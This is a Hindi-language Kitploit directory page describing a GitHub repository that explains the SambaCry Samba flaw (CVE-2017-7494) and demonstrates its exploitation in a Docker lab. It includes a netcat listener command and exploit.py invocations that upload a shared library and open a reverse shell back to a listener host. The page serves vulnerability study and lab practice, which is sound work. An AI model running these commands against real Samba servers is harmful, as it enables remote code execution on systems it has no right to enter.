Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-7494 — SambaCry स्पष्टीकरण और शोषण डेमो | Kitploit
उपकरण/GitHubGitHub/yonliud/cve-2017-7494
भेद्यता विश्लेषणशोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubyonliud/cve-2017-7494

CVE-2017-7494

SambaCry स्पष्टीकरण और शोषण डेमो

रिपॉजिटरी देखें
291 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SambaCry (CVE-2017-7494) शोषण

CVE-2017-7494/SambaCry प्रमाणित उपयोगकर्ताओं को एक शेयर्ड लाइब्रेरी को एक लिखने-योग्य फ़ोल्डर में अपलोड करने और अपलोड की गई लाइब्रेरी का उपयोग करके निष्पादन हमला करने की अनुमति देता है।

भेद्यता विवरण

SambaCry एक पथ-सत्यापन भेद्यता है जो Samba द्वारा named-pipe अनुरोधों को संभालने के तरीके में होती है। आमतौर पर ये पाइप्स प्रोग्रामों को एक फाइल-जैसे चैनल के माध्यम से डेटा पढ़ने और लिखने के द्वारा एक-दूसरे के साथ संवाद करने देने के लिए उपयोग किए जाते हैं।

जब Samba को कोई अज्ञात पाइप नाम प्राप्त होता है, तो असुरक्षित संस्करण इसे एक डायनामिक रूप से लोड होने योग्य मॉड्यूल के नाम के रूप में मान सकते हैं। वे मॉड्यूल आमतौर पर व्यवस्थापक द्वारा स्थापित वैध .so लाइब्रेरी होते हैं।

यह भेद्यता किसी क्लाइंट को सामान्य मॉड्यूल या पाइप नाम के बजाय एक पूर्ण फाइलसिस्टम पथ प्रदान करने की अनुमति देती है। Samba इस पथ को ठीक से प्रतिबंधित नहीं करता है और प्रभावी रूप से यह कर सकता है: dlopen("/data/example.so", ...);।

शेयर्ड लाइब्रेरी लोड करने से इसका इनिशियलाइज़ेशन कोड निष्पादित होता है। इसलिए, एक हमलावर जो किसी लिखने-योग्य स्थान पर एक दुर्भावनापूर्ण .so फाइल अपलोड कर सकता है, वह Samba सेवा से उसे लोड करवा सकता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।

डेमो

https://github.com/user-attachments/assets/270c6725-708d-4e72-996a-b6c40e77f010

उपयोग

  1. एक लिसनर प्रारंभ करें:
nc -lvnp 4444
  1. पूरी प्रक्रिया निष्पादित करें
python3 exploit.py --url //127.0.0.1/data --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --lhost 172.26.242.223 --lport 4444 --remote-path /data/payload.so

पहले से अपलोड किए गए पेलोड को ट्रिगर करने के लिए:

python3 exploit.py --stages trigger --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --remote-path /data/payload.so
  1. लिसनर के टर्मिनल में। एक शेल दिखाई देनी चाहिए।

लैब वातावरण

पूर्व-निर्मित docker-compose.yml का उपयोग करके असुरक्षित लैब को प्रारंभ करें।

docker compose up -d

यह लैब Samba 4.5.9 का उपयोग करता है। जो इस भेद्यता के प्रति संवेदनशील है।

प्रभावित संस्करण

3.5.0 - 4.4.13 4.5.0 - 4.5.9 4.6.0 - 4.6.3

टूल डाउनलोड करें